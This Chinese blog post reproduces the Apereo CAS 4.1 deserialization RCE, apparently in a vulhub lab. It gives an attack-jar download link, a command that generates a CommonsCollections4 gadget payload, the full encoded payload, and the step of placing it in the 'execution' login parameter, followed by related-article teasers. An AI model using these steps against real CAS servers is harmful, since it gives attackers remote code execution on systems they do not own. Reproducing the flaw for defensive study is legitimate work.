Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现

2023-11-09 12:12

本文主要是介绍Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

漏洞描述

Apereo CAS 是一个企业单点登录系统。CAS 尝试通过 Apache Commons Collections 库反序列化对象时存在问题,这导致了 RCE 漏洞。

漏洞复现及利用

工具下载

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

执行命令

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/yc"  

69576052-1e15-41e9-8779-1d75cac0fe3e_AAAAIgAAABBvrhv%2Bq3TScSkEIPXCL6eaAAAABmFlczEyOAvX3IUxcf4qwN0nzU0wGdAq1Pym2Q%2FR4lx1FzCNudvOiux09imSakD57fzWQZbR0Er1HHx4mZweItkuVcx0HRInEzKE%2BPiBU4gNJ2VOKN%2B3sp3%2BdSLTZH6urog9Bx6u2%2BlKaxd55RGMu0EEAHMGAsaoblAv1pY%2B5EdohWXcIGn0C6yWPtWY2b7lstXDYzLmtrh6NNZrRVSUCTk13DBRuw%2FqYW2FuwPSnQKGqPuuwMzdHCwlZ%2FGI8pQqOZJjo2hOreJXf9u4U9fPMbbUh%2BYfEknpMW9gFpsw2b06%2FBPsHxdVl6n5TNvFuN%2B9riZuHI2DX5tKABIsQ4y1oXAuEpxCKqji1UVGuS01NFc7EoTL89F8MrC8AHnUXmB4mpLmVW0KAy2BsraDYiQTF8D93Qdrt0cBSFrOxKju62JuXqrion1zQa%2FYM1xnc46pR9V91QAL7GxHfSsPc4h1yiO0TMhwswjUzwzHRD768472U78EL55MhpMyn02GdfBpEhXNLjdgLGxdPbm86w7b2vPnwRkADS48D0i0VtFpvEicEMFJQS0FMNyxLso1aCaUUPOQV85X9%2BLeNlz7Ev1hzaGaLoBmH8qdMuQAQYFbkOFoYjHsQACkAqIC4n1cQZGdRpEKrzdFVls2%2B1I79%2BOC4jhoEJx%2F%2F%2BAJsO8inOboeihqWNMPsIbhftPd8OJZLSO4d2h8giz43Gv84KYyriEIUViKmhvcRWOIFgog2%2FVw%2FjdE7csHEs5TtqxuT4ID279ojj7buRJjWp%2FymSgROITWO6LVI7Q2scg9na3p9S4dpX1KHNWf8B7ruKzX5njE2ieQktIDS8%2F%2BITFBR7%2BRnRyTkoI%2BKadj862yBaFduU10kesl%2FcmSYVOWFkdC%2B4dk%2FAKDDmbbom4AB3uYh%2FE7VQoN8N5PpivdEYdYFGgdxDVVoLsnJgWk9%2Fvrr6n9HJl7njUuUrDYn3iH29IYU%2FMrNzB%2FPJ3V131WOs%2B6TMNUrWtmn%2Fl1I6Eg7qTuwQf%2B5yQ%2BVBW157LgEmyIVfVHidNUNB5Y9DW1ShXwD7hsQ5TMVKcUJ2oozCeezMO6gKa0sLge9NYPbXJZMADyFrjS0yUM9hmBp4Jh2WuW03cKZ9iyOGywrvhYtqFHcPpcJhJaY6TrItYGJoJqgpW5fHYLMHgmO4c6jFxZ0Mxk6iwNZtDEFXdjgaJohES7hlCoduiUx%2FDmFNbNvnSEeBdkGis3xzz4X5u5OSsarUf5osUvuBjWHzF4Nt5bnzNPd6BRjt9R%2FAhIAnE3n1Zei67ksQaqLfgxwm3sX366ZPX%2BctIxXmK8GdhEeq5mg6PBN21KlryBaewT1U%2FNo7rRpLG39qZij1U9CtSZ1TcO96lWXtS1nFGKMWagkSNKS3NeZO%2Fx9ZR3jm%2FMepWl61S9QUsJN2g924wIVzFgrubj5qqRaIYoHIW7rQji5insBvMyaTxeaHRBwh00qRZklbADSvwiuxx4WSM%2FGvpj2XK8pK6i0FTGHqIMeilVoA6MbG3RCSojZ%2BLRxMXDGJgPpu9D0HIKTJ5sl1v6ot%2Fm%2F8xntzKHKKmmNcfhfZ9Q2wPzKsYTqw%2BN8j%2FmzuAU5iCYva5l2RuPADEKk4kD5C7c48k3t%2FUBbHt3t0sLhGRJ0MSU95gE6PC90TQMSIRj%2BlNCCeZpyLHy578H0eXYi6ZPVj%2FyFiOpgdP0hw52y79xfBFM9UxwJeVdspxM%2FDD2gZMt8CuqVoot9RvROV74nzgOmEJRVowM%2FIpLbxmpYXDxSX%2B4F6qAXnBd%2FBvUbKys3hYHoZp7tu7nN5HkSr4ayLZUWciOu0zp2UsOxkQsNCl%2FzN2IwjG17D%2FlVXPJDe6pVPa%2BKh6wpVeXVEj4YYr%2BhBDmFA4MF0aAQEa4J0YNRsIVMw9DClb1H5%2FbIfzuYAoCuxluTD8SZcLrLxWMIaDhlVML0v%2FICTJwIyPfOFTnmFlx7aNM6QbOKHOs

将execution替换为payload即可

 可以看到,命令已经执行成功

这篇关于Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/376009

相关文章

Django序列化中SerializerMethodField的使用详解

《Django序列化中SerializerMethodField的使用详解》:本文主要介绍Django序列化中SerializerMethodField的使用,具有很好的参考价值,希望对大家有所帮... 目录SerializerMethodField的基本概念使用SerializerMethodField的

Jackson库进行JSON 序列化时遇到了无限递归(Infinite Recursion)的问题及解决方案

《Jackson库进行JSON序列化时遇到了无限递归(InfiniteRecursion)的问题及解决方案》使用Jackson库进行JSON序列化时遇到了无限递归(InfiniteRecursi... 目录解决方案‌1. 使用 @jsonIgnore 忽略一个方向的引用2. 使用 @JsonManagedR

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库

Java中JSON字符串反序列化(动态泛型)

《Java中JSON字符串反序列化(动态泛型)》文章讨论了在定时任务中使用反射调用目标对象时处理动态参数的问题,通过将方法参数存储为JSON字符串并进行反序列化,可以实现动态调用,然而,这种方式容易导... 需求:定时任务扫描,反射调用目标对象,但是,方法的传参不是固定的。方案一:将方法参数存成jsON字

Detectorn2预训练模型复现:数据准备、训练命令、日志分析与输出目录

Detectorn2预训练模型复现:数据准备、训练命令、日志分析与输出目录 在深度学习项目中,目标检测是一项重要的任务。本文将详细介绍如何使用Detectron2进行目标检测模型的复现训练,涵盖训练数据准备、训练命令、训练日志分析、训练指标以及训练输出目录的各个文件及其作用。特别地,我们将演示在训练过程中出现中断后,如何使用 resume 功能继续训练,并将我们复现的模型与Model Zoo中的

UMI复现代码运行逻辑全流程(一)——eval_real.py(尚在更新)

一、文件夹功能解析 全文件夹如下 其中,核心文件作用为: diffusion_policy:扩散策略核心文件夹,包含了众多模型及基础库 example:标定及配置文件 scripts/scripts_real:测试脚本文件,区别在于前者倾向于单体运行,后者为整体运行 scripts_slam_pipeline:orb_slam3运行全部文件 umi:核心交互文件夹,作用在于构建真

文章解读与仿真程序复现思路——电力自动化设备EI\CSCD\北大核心《考虑燃料电池和电解槽虚拟惯量支撑的电力系统优化调度方法》

本专栏栏目提供文章与程序复现思路,具体已有的论文与论文源程序可翻阅本博主免费的专栏栏目《论文与完整程序》 论文与完整源程序_电网论文源程序的博客-CSDN博客https://blog.csdn.net/liang674027206/category_12531414.html 电网论文源程序-CSDN博客电网论文源程序擅长文章解读,论文与完整源程序,等方面的知识,电网论文源程序关注python

【CSS in Depth 2 精译_023】第四章概述 + 4.1 Flexbox 布局的基本原理

当前内容所在位置(可进入专栏查看其他译好的章节内容) 第一章 层叠、优先级与继承(已完结) 1.1 层叠1.2 继承1.3 特殊值1.4 简写属性1.5 CSS 渐进式增强技术1.6 本章小结 第二章 相对单位(已完结) 2.1 相对单位的威力2.2 em 与 rem2.3 告别像素思维2.4 视口的相对单位2.5 无单位的数值与行高2.6 自定义属性2.7 本章小结 第三章 文档流与盒模型(已

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

Python---文件IO流及对象序列化

文章目录 前言一、pandas是什么?二、使用步骤 1.引入库2.读入数据总结 前言 前文模块中提到加密模块,本文将终点介绍加密模块和文件流。 一、文件流和IO流概述         在Python中,IO流是用于输入和输出数据的通道。它可以用于读取输入数据或将数据写入输出目标。IO流可以是标准输入/输出流(stdin和stdout),也可以是文件流,网络流等。